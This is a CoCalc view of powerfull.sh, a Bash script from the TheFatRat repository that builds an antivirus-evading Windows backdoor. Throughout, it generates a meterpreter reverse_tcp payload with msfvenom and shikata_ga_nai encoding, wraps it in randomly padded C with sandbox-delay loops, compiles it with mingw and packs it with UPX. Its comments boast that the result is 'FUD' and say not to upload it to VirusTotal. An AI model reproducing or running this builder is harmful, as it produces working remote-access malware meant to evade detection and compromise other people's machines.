CoCalc -- powerfull.sh

GitHub Repository: screetsec/TheFatRat
Path: blob/master/powerfull.sh
⁴⁹⁵ views
1
#!/bin/bash
2
file="config/config.path"
3
if [ -f "$file" ]
4
then
5
msfconsole=$(sed -n 13p ${file})	
6
msfvenom=$(sed -n 14p ${file})
7
backdoor=$(sed -n 15p ${file})
8
searchsploit=$(sed -n 16p ${file})
9
output=$(sed -n 17p ${file})
10
else
11
	echo "Configuration file does not exists , run setup.sh first ."
12
exit 1
13

14

15
fi
16
path=`pwd`
17
defcon=$path/config/conf.def
18
if [ -f "$defcon" ]
19
then
20
yourip=`sed -n 1p $defcon`
21
yourport=`sed -n 2p $defcon`
22
fi
23

24
function invalid1 ()
25
{
26
err=0
27
echo ""
28
if [ -z "$yourip" ]; then 
29
echo -e $red ""
30
echo "[ ! ] You must write an IP or Hostname ."
31
echo -e $okegreen ""
32
echo "IP Example : 192.168.1.34
33
Domain Example : myhost.com"
34
err=1
35
fi
36
echo ""
37
if [ -z "$yourport" ]; then 
38
echo -e $red ""
39
echo "[ ! ] You must write a port number between 1 & 65535 ."
40
err=1
41
fi
42
echo -e $okegreen ""
43
}
44

45
#get user local ip , public ip & hostname into variables
46
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
47
lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
48
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
49
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
50
comp="0"
51
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
52
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
53
# check mingw if exists
54
      which i686-w64-mingw32-gcc > /dev/null 2>&1
55
      if [ "$?" -eq "0" ]
56
      then
57
      echo [✔]::[mingw32]: installation found!;
58
      comp="1"
59
fi
60
      which x86_64-w64-mingw32-gcc > /dev/null 2>&1
61
      if [ $? -eq 0 ]
62
      then
63
      echo [✔]::[mingw64]: installation found!;
64
     
65
if [ $comp == "0" ]
66
then
67
comp="2"
68
elif [ $comp == "1" ]
69
then
70
comp="3"
71
else
72
   echo [x]::[warning]:this script require mingw32 or mingw64 installed to work ;
73
   echo ""
74
   echo [!]::Run setup.sh to install mingw64 ;
75
   sleep 2s
76
   exit 1
77
 fi
78
fi
79

80

81

82
# check upx if exists
83
      which upx > /dev/null 2>&1
84
      if [ $? -eq 0 ]; then
85
      echo [✔]::[Upx]: installation found!;
86

87
else
88

89
   echo [x]::[warning]:this script require upx to work ;
90
   echo ""
91
   echo [!]::Run setup.sh to install upx ;
92
   echo ""
93
   sleep 2s
94
   exit 1
95
fi
96

97
###################################################################################################
98
# FatRat Coded By Screetsec ( Edo Maland )
99
# Program to create a C program after it is compiled that will bypass most AV
100
# Test in Kali Linux :)
101
# Very Slow to create Backdoor But Very powerfull for bypass AV
102
# Easy to Use 
103
# FUD for popular Antivirus :) 
104
# Dont Upload to virus total
105
####################################################################################################
106

107

108
#Checking
109
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
110
clear                                   
111
SERVICE=service;
112

113
#This colour 
114
cyan='\e[0;36m'
115
green='\e[0;34m'
116
okegreen='\033[92m'
117
lightgreen='\e[1;32m'
118
white='\e[1;37m'
119
red='\e[1;31m'
120
yellow='\e[1;33m'
121
BlueF='\e[1;34m'
122
yellow='\e[1;33m'
123
orange='\e[38;5;166m'
124

125
rm -f $output/Powerfull.exe >/dev/null 2>&1
126
rm -f $output/Powerfull-fud.exe >/dev/null 2>&1
127
#Banner
128
clear
129
echo
130
echo -e $yellow""
131
echo " =========================================================================="
132
echo -e $okegreen" FatRat Coded By Screetsec ( Edo -Maland- ) "
133
echo
134
echo -e $yellow"   / __/ /__ _    __  / _ )__ __/ /_  / _ \___ _    _____ ____/ _/_ __/ / / "
135
echo "  _\ \/ / _ \ |/|/ / / _  / // / __/ / ___/ _ \ |/|/ / -_) __/ _/ // / / /  "
136
echo " /___/_/\___/__,__/ /____/\_,_/\__/ /_/   \___/__,__/\__/_/ /_/ \_,_/_/_/   "
137
echo""
138
echo -e $okegreen" This program compiles a C program with a meterpreter reverse_tcp payload "
139
echo " In it that can then be executed on a windows host "
140
echo " Program to create a C program after it is compiled that will bypass most AV "
141
echo -e $yellow" =========================================================================="
142
echo -e $okegreen""
143

144
#input lhost and lport
145
echo -e $okegreen""
146
echo -e $yellow "Your local IPV4 address is : $lanip"
147
echo -e $yellow "Your local IPV6 address is : $lanip6"
148
echo -e $yellow "Your public IP address is : $publicip"
149
echo -e $yellow "Your Hostname is : $hostn"
150
echo -e $okegreen ""
151
if [ ! -f "$defcon" ]
152
then
153
yourip=""
154
yourport=""
155
fi
156
if [ -z "$yourip" ]; then
157
read -p '  Set LHOST IP: ' yourip
158
fi
159
echo -e $okegreen ""
160
if [ -z "$yourport" ]; then
161
read -p '  Set LPORT: ' yourport
162
fi                                                                       
163
invalid1				
164
if [ $err == "1" ] 
165
then
166
echo -e $okegreen ""
167
echo -n "Press any key to restart again ."
168
read inp
169
./powerfull.sh
170
fi
171

172
echo ""
173
if [ $comp == "1" ]
174
then
175
COMPILER="i686-w64-mingw32-gcc"
176
fi
177
if [ $comp == "2" ]
178
then
179
COMPILER="x86_64-w64-mingw32-gcc"
180
fi
181

182
if [ $comp == "3" ]
183
then
184
echo ""
185
echo -e $yellow "You can compile this FUD for 32bit or 64bit windows machines"
186
echo ""
187
echo -e $green "Choose one of the following options"
188
echo -e $orange "+-------------------------------+"
189
echo -e $orange "|$white [$green 1$white ] $yellow Compile 32bit FUD Exe $orange |"
190
echo -e $orange "|$white [$green 2$white ] $yellow Compile 64bit FUD Exe $orange |"
191
echo -e $orange "+-------------------------------+"
192
echo ""
193
echo -ne $green "Choose (1 or 2) : " ;tput sgr0
194
read archs
195
case $archs in 
196
1)
197
COMPILER="i686-w64-mingw32-gcc"
198
echo ""
199
echo -e $green "32bit Selected"
200
sleep 1
201
;;
202
2)
203
COMPILER="x86_64-w64-mingw32-gcc"
204
echo ""
205
echo -e $green "64bit Selected"
206
sleep 1
207
;;
208
*)
209
COMPILER="x86_64-w64-mingw32-gcc"
210
echo ""
211
echo -e $green "Invalid Option , setting 32bit as default"
212
sleep 1
213
;;
214
esac
215
fi
216
echo -e $okegreen 
217
payload="windows/meterpreter/reverse_tcp"
218
msfvenomBadChars="\x00\xff"
219
msfvenomEncoder="x86/shikata_ga_nai"
220
msfvenomIterations="3"  # Recommended value: 3
221

222
randomness=3517		# The higher the randomness the more padding is added to the c program increasing the binaries size
223
delayRandomness=32676	# The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox
224

225
#Set directory
226
currentDir=`pwd`
227
outputDir="$output/"
228
outputExe="${outputDir}Powerfull.exe"  # You can change the name of the executable on this line
229
outputUPX="${outputDir}Powerfull-fud.exe"  # You can change the name of the executable on this line
230

231
cProg="${currentDir}/prog.c"
232
cProgTemp="${currentDir}/prog.c.temp"
233

234
# Create some padding to be compiled in the C program this adds randomness to the binary
235
function old_generatePadding {
236

237
    counter=0
238
    randomNumber=$((RANDOM%${randomness}+7))
239
    while [  $counter -lt $randomNumber ]; do
240
        echo "" >> $cProg
241
	randomCharnameSize=$((RANDOM%5+12))
242
	randomPaddingSize=$((RANDOM%1024+2048))
243
        randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
244
        randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
245
        echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
246
        let counter=counter+1
247
    done
248
}
249

250
function generatePadding {
251

252
    paddingArray=(0 1 2 3 4 5 6 7 8 9 a b c d e f)
253

254
    counter=0
255
    randomNumber=$((RANDOM%${randomness}+23))
256
    while [  $counter -lt $randomNumber ]; do
257
        echo "" >> $cProg
258
	randomCharnameSize=$((RANDOM%10+7))
259
        randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
260
	echo "unsigned char ${randomCharname}[]=" >> $cProg
261
    	randomLines=$((RANDOM%20+13))
262
	for (( c=1; c<=$randomLines; c++ ))
263
	do
264
		randomString="\""
265
		randomLength=$((RANDOM%11+7))
266
		for (( d=1; d<=$randomLength; d++ ))
267
		do
268
			randomChar1=${paddingArray[$((RANDOM%15))]}
269
			randomChar2=${paddingArray[$((RANDOM%15))]}
270
			randomPadding=$randomChar1$randomChar2
271
	        	randomString="$randomString\\x$randomPadding"
272
		done
273
		randomString="$randomString\""
274
		if [ $c -eq ${randomLines} ]; then
275
			echo "$randomString;" >> $cProg
276
		else
277
			echo $randomString >> $cProg
278
		fi
279
	done
280
        let counter=counter+1
281
    done
282
}
283

284

285
# Check to see the output directory exists
286
if [[ ! -d "$outputDir" ]]; then
287
    mkdir $outputDir
288
fi
289

290
echo ""
291
echo "You may see multiple errors until the executable is compiled successfully."
292
echo ""
293
if [[ $msfvenomIterations > 3 ]]; then
294
	echo "Most of the errors are due to the msfvenom iterations value is set too high."
295
	echo "Recommended value: msfvenomIterations=3"
296
fi
297
echo ""
298

299
# Check to see if the executable was previously created
300
if [[ -f "$outputExe" ]]; then
301
	echo "Remove the executable at ${outputExe} to recreate it."
302
	echo ""
303
fi
304

305

306
sleep 2
307

308

309
# Until the Powerfull.exe is compiled successfully loop until it is
310
while [[ ! -f "$outputExe" ]]; do
311

312
    # Delete the c program and recreate it
313
    rm -f $cProg
314

315
    generatePadding
316

317
    echo "" >> $cProg
318
    echo "int main(void)" >> $cProg
319
    echo "{" >> $cProg
320

321
    # Introduce a couple of processing loops for a delay
322
    echo "" >> $cProg
323
    echo "int zewd5 = 1, rqs3 = 1;" >> $cProg
324
    echo "for ( zewd5 = 1 ; zewd5 <= ${delayRandomness} ; zewd5++ )" >> $cProg
325
    echo "   for ( rqs3 = 1 ; rqs3 <= ${delayRandomness} ; rqs3++ )" >> $cProg
326
    echo "   {}" >> $cProg
327
    echo "" >> $cProg
328
  
329
    generatePadding
330
  
331
    echo "" >> $cProg
332
    $msfvenom -p ${payload} LHOST=$yourip LPORT=$yourport -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg
333

334
    generatePadding
335

336
    echo "" >> $cProg
337
    echo "((void (*)())buf)();" >> $cProg
338
    echo "" >> $cProg
339

340
    generatePadding
341

342
    echo "" >> $cProg
343
    echo "}" >> $cProg
344
	
345
    randomBufNameSize=$((RANDOM%10+23))
346
    randomBufName=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomBufNameSize}`
347
    cat $cProg | sed "s/buf/${randomBufName}/g" > $cProgTemp
348
    mv -f $cProgTemp $cProg
349
    # To install the following program on Kali Linux - "apt-get install gcc-mingw32"
350
    $COMPILER -o $outputExe $cProg
351

352
done
353
if [[ -f "$outputExe" ]]
354
then
355
echo "Uncompressed backdoor created in : $outputExe"
356
else
357
echo "Unable to compile backdoor"
358
echo -n "Press Enter to return to menu"
359
read rsp
360
exit 0
361
fi
362
echo ""
363
echo -n "Compressing $outputExe with UPX to be less detectable ...."
364
# Use UPX to create a second executable, testing...
365
upx -q --ultra-brute -o $outputUPX $outputExe >/dev/null 2>&1
366
echo "Done"
367

368
if [[ -f "$outputUPX" ]]
369
then
370
echo "Compressed Backdoor was build in : $outputUPX"
371
echo ""
372
echo -n "Press Enter to return to fatrat menu"
373
read rsp
374
exit 0
375
else
376
echo "Unable to compress $outputExe with UPX"
377
echo -n "Press Enter to return to fatrat menu"
378
read rsp
379
exit 0
380
fi
381

382
Product

Resources

Company
